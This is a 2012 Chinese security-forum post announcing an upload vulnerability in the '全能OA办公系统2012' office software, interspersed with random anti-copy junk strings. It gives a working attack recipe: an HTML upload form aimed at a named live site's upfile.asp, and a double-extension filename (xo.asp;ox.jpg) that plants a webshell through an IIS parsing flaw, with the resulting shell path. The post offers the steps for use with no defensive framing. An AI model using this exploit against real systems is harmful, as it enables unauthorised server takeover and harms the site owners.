找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2307|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞9 V% o% i; c6 N1 L3 g- p2 A: I$ }4 i

  L5 h, l; z7 J) F8 ]系统介绍:
1 w1 d, i& N* Y" E4 E0 v
4 i* E* l: a- T! }+ D) \, i全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。. y5 S7 |4 r& O. m
7 J# F! N& Z' P9 S/ E+ D8 g
主要功能:! P( _) \; D- y4 {+ R
公司通告
- \5 N$ k; _6 F7 ?1 s工作计划
6 Y) p* ~3 |- Q. _7 L通讯助理
' a* g7 T: f- a( d客户资源 9 P6 [  L  v. C4 Z5 }6 \0 q& j
我的公文
% S) Z. k# f' C! @* t- F2 i公文传阅
# F5 B  W+ c5 g公共资源 0 }9 g& {1 R/ o4 I6 v' U3 j2 z9 M
资源预约 ) Q: j" i  U& b) l/ W! M$ Q
今日考勤 * w8 {' ?6 n' }% V& \
个人计划
* @& l. }! \& n: \4 z2 Z* R9 p9 S. t个人通讯录
) K4 j- [, g2 _5 F/ u个人基本档案 1 a- W3 P3 Y' _3 m& ~- D  o. P8 v7 R7 z- T
未读邮件
, X& y5 B- W+ l4 g2 x6 ?发邮件 6 A% a8 s6 l& B+ C% ^$ ~1 k" Z
收件夹 . t5 t* g% s& e4 n' \. U
寄件夹
0 l: E3 c9 D0 j. Z3 u' m网络硬盘
8 H  n9 ~6 X8 o% k5 a7 u网络会议
3 }( Q9 ~) |* _" U, b/ ]3 @1 B网络调查
# V- S2 L4 V2 [2 @2 m( [6 c交流论坛' ]9 l% g9 k$ J$ O0 u. E! U; l
, R0 O: }3 Y4 g% {0 @( e  Q  n
有兴趣测试的朋友可以下源码看看
; K. A" d1 M- k
) c4 Z( x2 [: L' U' B2 E& y源码下载:7 h/ ?% {; s$ C
# N  x( ?9 [3 p! R3 _8 s. i
http://www.mycodes.net/30/4750.htm
1 T/ C6 I0 a  {4 `6 [9 {
: ]7 n( q* K; ]& ^" I漏洞介绍:- j8 u! t0 `6 ~2 e1 f

7 M* {0 q4 Y  i+ ^* J由upfile.asp上传文件漏洞引起
( A6 Q& y: f; R  t# _) m
9 I3 ?( q! J6 d& j& [! U! s! d" I测试方法:
/ f" r$ m9 Y/ m' `/ z( `
# G. v+ [5 X) ~. n- i1 ]使用名小子上传http://www.itlynn.com/upfile.asp即可
0 j. `* a* d& E! n; j# _* V. P8 |6 N+ E4 W- Y7 Q( A2 w
如果upfile.asp文件被删除不存在。; h) Q9 m2 K! i/ y. h

1 M7 _6 M4 t; X4 a& n  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
/ Q' e# P* j  f' j! ~( Z0 m) |
如果存在那么将如下代码保存为upfile.html。/ N- e4 J; z$ @, E7 p- C( h

1 N+ r3 H- M- u) @7 m% t/ ^( q然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp& G$ p% {$ X! U3 T% _2 @+ i

) u4 M* W6 u5 l # D$ g1 |+ N! V% R  w2 H1 o+ Q

7 P0 g5 P: w& Y* R, |& i01 <table border='0' align="center" cellpadding="5">   c* u0 i- B1 K0 ^! E5 p

  t& K) Z: [- ^; y% b02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
+ t6 l# S" m  J, C' Q& J! {  `& V: R- z( y8 _
03 <tr>
6 [, x6 ~9 [# W& l7 U3 q% o& P5 O* R& h4 k0 V
04             <td>报错:</td> " @- \2 o9 r) Y5 f1 z& r

) K7 `* l. I" s2 ]; r* t05             <td><input type='radio' name='errnumber' value='0'> * A8 N! j2 X- F& H4 X9 I/ W

/ l, n% l: m$ V; n' y2 G6 Y06               自动更名 ' M1 h% [5 A1 J& P% {4 k* E8 [
2 L2 u2 n/ k" v
07               <input type='radio' name='errnumber' value='1' checked>
9 b! _  H8 X( o- W1 ?% k
" m. q0 x# r* V/ J$ D- c6 A1 Q08               报错方式
( B9 Z( W( ~$ @9 x+ r' j) |: N3 w4 n$ c. O; q. q" Q. O' ~6 @
09               <input type='radio' name='errnumber' value='2'>
# m( i" _: u" j5 P, X5 D2 y
2 Z( ]& I& O0 {4 }' a3 f) R' T  U6 Z0 v10               直接覆盖</td>
- U! U4 v% {- s6 C$ S' q$ t1 d
! G! P+ C/ u4 {& }5 m11           </tr> & E5 L4 e8 l' T4 }

5 r( s: _8 O: {) `0 _+ k) s12           <tr> ; H% m0 o/ ?- M: O) {9 _; ^

: ^) F* N6 |# J2 F2 S" ]1 _13             <td>主题:</td>
- |- m% b) @- L! e
/ |% E/ ^$ N0 K8 q' R14             <td><input type='text' name='filename' size='30'></td> + A  W$ n+ S1 C
% }! w- w& s/ }# i
15           </tr> 4 l% Z) p9 \$ \' I

" k' b$ |& f! n! i. U16           <tr>
& L8 S: h0 K6 W3 ^' I( D2 I6 N4 e, P! q8 s. C$ {+ O$ E* H
17             <td>文件:</td> . {6 g0 W9 D$ A# a3 o3 C

* i2 b0 k) b2 ?4 V7 g/ a18             <td><input type="file"name="fruit"size="30"></td>   Y3 J7 ?( l2 O2 r! b
! }4 e: V6 Y2 H& g" ?. Y3 A
19           </tr>
5 s1 k7 _: H0 F8 U) \! X
" Z2 D! n) a; @' F20           <tr> 5 J' O3 u& ^% d" n! m! \( D/ G
$ n& C, s1 J6 D1 y# T1 k' L/ {" P! C2 J
21             <td valign='top'>简介:</td>
- s6 X; s6 u/ g& G6 g; ?3 g7 ^( k9 C. }2 X& ]* [
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
; _. ^, U  s5 F) f" M
# x) X# T- l. `3 t8 G23           </tr>
! }  O. v9 [. }) ]3 D6 ?* S# d
8 ~2 m3 ^9 q, O' c! x; X, W24   
7 V' M/ R; K% G8 Z* Z) G+ u( D* m4 o: c
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 0 A2 w5 V1 D: J1 S8 M
) f4 d, v* B" {- |: q& h0 l
26           </tr>
) ?' k3 C+ R5 }. [% F; B; `  Y& L  u2 h! j; x0 o
27         </form> 3 w. |. o7 A) u2 l% N' l: z

( o5 \/ C  U, I# w* y% \$ t' V1 d然后打开上传一个文件名为xo.asp;ox.jpg的文件。
0 Q4 d! W; n/ w* X9 w% e7 w% d& O3 p, z( P2 s# @
7 h/ B4 V6 l; E: Q2 C- i

6 H6 T1 u( Q2 E8 V上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
7 C/ u8 }" {/ O. l7 x( @; E4 P; x$ g* `
此漏洞需要配合解析漏洞利用。
& t( a5 h6 q2 z9 r) |# j! a
& ]# T# w, K, s: _  o6 i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表